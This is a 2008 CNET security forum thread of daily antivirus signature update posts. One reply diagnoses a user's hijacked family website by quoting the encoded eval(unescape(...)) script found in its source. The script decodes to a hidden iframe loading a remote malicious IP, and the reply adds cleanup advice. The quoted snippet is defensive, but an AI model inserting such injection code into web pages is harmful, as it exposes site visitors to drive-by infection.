Spyware, Viruses, & Security forum

General discussion

UPDATES - July 4, 2008

TrojanHunter 5.0 Ruleset Update - July 3, 2008

An updated TrojanHunter ruleset is available. This update adds at least 34 new trojan definitions:

Adware.StickyPops.100
Adware.Vapsup.290
Agent.2555
Agent.2554
BHO.304
Hoax.Renos.367
Hupigon.1226
Monder.164
Monder.163
Monder.162
Monder.161
Mondera.104
Obfuscated.405
Obfuscated.404
PWSteal.LdPinch.714
PWSteal.OnLineGames.1120
Rootkit.Agent.350
Srizbi.116
Tibs.516
TrojanClicker.Small.243
TrojanDownloader.ConHook.192
TrojanDownloader.Delf.1390
TrojanDownloader.FraudLoad.229
TrojanDownloader.FraudLoad.228
TrojanDownloader.FraudLoad.227
TrojanDownloader.Tibs.263
TrojanDownloader.Wigon.105
TrojanDownloader.Zlob.1502
TrojanDownloader.Zlob.1501
TrojanDropper.Agent.918
TrojanProxy.Agent.430
TrojanSpy.FlyStudio.100
Vundo.1199
Worm.Pushbot.100

Licensed TrojanHunter users can easily update using TrojanHunter's LiveUpdate utility. If you are using the trial version of TrojanHunter, please see http://www.misec.net/trojanhunter/updating/ for instructions on how to update to the latest ruleset.

You should have 179065 rules.
http://www.misec.net/forum/board/RulesetUpdates/1215145549
Discussion is locked
You are posting a reply to: UPDATES - July 4, 2008
The posting of advertisements, profanity, or personal attacks is prohibited. Please refer to our CNET Forums policies for details. All submitted content is subject to our Terms of Use.
Track this discussion and email me when there are updates

If you're asking for technical help, please be sure to include all your system info, including operating system, model number, and any other specifics related to the problem. Also please exercise your best judgment when posting in the forums--revealing personal information such as your e-mail address, telephone number, and address is not recommended.

You are reporting the following post: UPDATES - July 4, 2008
This post has been flagged and will be reviewed by our staff. Thank you for helping us maintain CNET's great community.
Sorry, there was a problem flagging this post. Please try again now or at a later time.
If you believe this post is offensive or violates the CNET Forums' Usage policies, you can report it below (this will not automatically remove the post). Once reported, our moderators will be notified and the post will be reviewed.
Collapse -
BOClean FILE DATE : 2008-07-04 13:08:56 (UTC)

In reply to: UPDATES - July 4, 2008

TWENTY SIX new nasties for a total of 58013 **UNIQUE**
infectors (322,580 variants of these including
trojans,worms,bots,hijackers,downloaders,spam proxies, rootkits, adware,
spyware,keyloggers,"dialers" and other malware in total) covered in
today's update for BOClean 4.26.

Please also note that if you ever miss an update (or several) the update
you collect includes **ALL** previous update information. There is no
need to go hunting down other updates. The current one is always complete.
http://www.nsclean.com/trolist.html
Collapse -
BOClean FILEDATE: 2008-07-04 14:25:01 (UTC)

In reply to: BOClean FILE DATE : 2008-07-04 13:08:56 (UTC)

TWENTY new nasties for a total of 58033 *UNIQUE* infectors (
322,613 variants of these including trojans, worms, bots, hijackers,
downloaders, spam proxies, rootkits, adware, spyware, keyloggers,
"dialers" and other malware in total) covered in today's update for
BOClean 4.26.

Please also note that if you ever miss an update (or several) the update
you collect includes ***ALL*** previous update information. There is no
need to go hunting down other updates. The current one is always complete.
http://www.nsclean.com/trolist.html
Collapse -
NOD32 - 3241 (20080704)

In reply to: UPDATES - July 4, 2008

2008-07-04 11:41
INF/Autorun, Win32/Adware.Antivirus2008, Win32/Adware.Websearch, Win32/Agent.LNO, Win32/Agent.NXB (7), Win32/Agent.NXP (2), Win32/Autoit.DB, Win32/Autoit.DC (2), Win32/Autoit.DD (3), Win32/AutoRun.GQ (2), Win32/AutoRun.LU (3), Win32/AutoRun.RO (2), Win32/Bagle.PD, Win32/Mebroot.N (5), Win32/Pacex.Gen (2), Win32/PSW.OnLineGames.NMP, Win32/PSW.OnLineGames.NMY (2), Win32/PSW.OnLineGames.NNU (3), Win32/PSW.OnLineGames.NOP (3), Win32/PSW.OnLineGames.NXW, Win32/PSW.OnLineGames.NXX (2), Win32/PSW.OnLineGames.ODJ (2), Win32/Small.NDZ (3), Win32/Spy.Agent.NES, Win32/Spy.Banbra.NLM, Win32/TrojanClicker.VB.QF, Win32/TrojanDownloader.Banload.JFB, Win32/TrojanDownloader.Banload.KGG, Win32/TrojanDownloader.Banload.PFR (2), Win32/TrojanDownloader.VB.NPK (3), Win32/TrojanDownloader.Zlob.CCM (14), Win32/TrojanDropper.Agent.NJV, Win32/TrojanDropper.Delf.NHN, Win32/Zalup
http://www.eset.eu/podpora/aktualizacia-3241?lng=en
http://www.eset.eu/support/update-xy1
Collapse -
NOD32 - 3243 (20080704)

In reply to: NOD32 - 3241 (20080704)

2008-07-04 18:00
Win32/Agent.NIM (2), Win32/AutoRun.JX, Win32/AutoRun.RQ (4), Win32/Injector.BH, Win32/KeyLogger.Ardamax, Win32/KeyLogger.Ardamax.NAJ, Win32/PSW.Agent.NHG, Win32/PSW.Agent.NHV, Win32/PSW.Agent.NHW (2), Win32/PSW.Lineage.NGV, Win32/Spy.Agent.PZ, Win32/Spy.Banker.ORW, Win32/Spy.Banker.OWX, Win32/Spy.Delf.NHV, Win32/Spy.Delf.NJS (3), Win32/Spy.Pophot.BHB, Win32/TrojanDownloader.Small.ODI, Win32/TrojanDownloader.Zalup.D (2)
http://www.eset.eu/podpora/aktualizacia-3243?lng=en
http://www.eset.eu/support/update-xy1
Collapse -
Roddy, can you educate me re JS:Agent-AE

In reply to: NOD32 - 3241 (20080704)

Roddy, I have a family web site www.welcomefriends.org that has family photos. For years I have used to share photos with family spread around the USA. Recently, when I click the link to enter the site from the opening page, I get an AVAST! warning that prevents the index.htm page from opening saying that the malware Trojan Horse JS:Agent-AE is present. That trojan is not on my hard drive since I scanned with AVAST!. So it is on the web site itself (ipower.com is my site host).

I did a Google search and got lots of hits in foreign lanaguages and a few in English which led me to your posts.

As a newbie, what can you tell me about this Trojan and what can I do to remove it..or is it up to the host site to remove? Please send reply to my email xxx xxxxxxx as well as the CNET forum to be sure I see your answer.

Thanks Phil

Message was edited by: admin to remove email address to prevent spam harvesters from picking it up.

Collapse -
Hi Phil

In reply to: Roddy, can you educate me re JS:Agent-AE

This is the updates thread, You need to start your own new thread in the forum and someone, probably Marianna will help you with this.

Another thing, you said you are a newbie and one of the first things to learn is to NEVER post your e-mail address in a public forum. We don't answer questions via e-mail anyway, They get answered in the same thread as your question so everyone will benefit.

Good luck to you. Happy

Collapse -
Your Webpage has been hijacked.......

In reply to: Roddy, can you educate me re JS:Agent-AE

Rightclicking on your webpage and looking for the view source, reveals at the end :

<script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%37%38%30%34%39%34%32%36%38%61%37%37%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%35%38%2e%36%35%2e%32%33%32%2e%33%33%2f%67%70%61%63%6b%2f%69%6e%64%65%78%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e

How can I tell if I've been hacked?

All your pages that a visitor would go to first to see your site (home page) will have the infected iframe, along with any login.php pages. This includes any index page in any subfolder and regardless of what the extension is. Be sure to check all index, default and home pages, and any login pages (just to be safe). You will see errors on your site you didn't see before. This is due to the hackers intentionally causing errors after uploading many script to have the information passed on to them. They also upload a file called xhide which is a process faker by schizoprenic Xnuxer Research 2002, and you will not be able to delete it (your host must), if you even find it...

The code may start like this:

<script language=javascript>document.write(unesc ape(%3C....." Or, this
<script>eval(unescape("%77 ... And there will be lots of encoded numbers following


What do I do if I'm hacked?

If you find any of the hacker's code, remove it in all your sites pages and subfolder pages, or restore a clean backup. This alone will not help you tho, as it's already been reported over and over again that the hackers simply re-add the iframe code after cleaning.... Once in your site, they are going to constantly be trying again! You need to clean your PC (reinstall if necessary) and change all your passwords. You especially need to change your hosting password and ftp passes, but change every password. If using the Article Dashboard script, or another script that is never updated for your protection, DELETE it completely from your hosting account so the hackers can't get back in


Read more here:

http://www.spambusted.com/

Collapse -
avast! 4.x VPS (released: 4.7.2008, version: 080704-1)

In reply to: UPDATES - July 4, 2008

Collapse -
BitDefender 16:08

In reply to: UPDATES - July 4, 2008

Collapse -
AntiVir Version: 7.00.05.52

In reply to: UPDATES - July 4, 2008

Collapse -
ClamAV #7638

In reply to: UPDATES - July 4, 2008

Latest ClamAV? stable release is: 0.93.1
Total number of signatures: 342087
ClamAV Virus Databases:
main.cvd ver. 47 released on 23 Jun 2008 18:20 +0000
daily.cvd ver.7638 released on 04 Jul 2008 11:41 +0000
http://www.clamav.net/

Collapse -
Panda

In reply to: UPDATES - July 4, 2008

Collapse -
McAfee Daily #5332

In reply to: UPDATES - July 4, 2008

Collapse -
AVG - AVI 270.4.5/ 1535

In reply to: UPDATES - July 4, 2008

Collapse -
NAV Daily

In reply to: UPDATES - July 4, 2008

Daily Updates
Symantec AntiVirus
Norton AntiVirus 2006/2007

Virus Definitions created July 4
Virus Definitions released July 4
Defs Version: 100704c
Sequence Number: 83199
Extended Version: 7/4/2008 rev. 3
Total Detections (Threats & Risks): 1883512
http://www.symantec.com/avcenter/defs.download.html
Collapse -
AVG Free 8.0.138

In reply to: UPDATES - July 4, 2008

Program update AVG Free 8.0.138
Fixed Bugs
Fixed problem with link scanning if <base> tag is presented on a web page.
http://free.avg.com/ww.94092

Popular Forums

icon
Computer Newbies 10,686 discussions
icon
Computer Help 54,365 discussions
icon
Laptops 21,181 discussions
icon
Networking & Wireless 16,313 discussions
icon
Phones 17,137 discussions
icon
Security 31,287 discussions
icon
TVs & Home Theaters 22,101 discussions
icon
Windows 7 8,164 discussions
icon
Windows 10 2,657 discussions

SMART HOME

This one tip will help you sleep better tonight

A few seconds are all you need to get a better night's rest.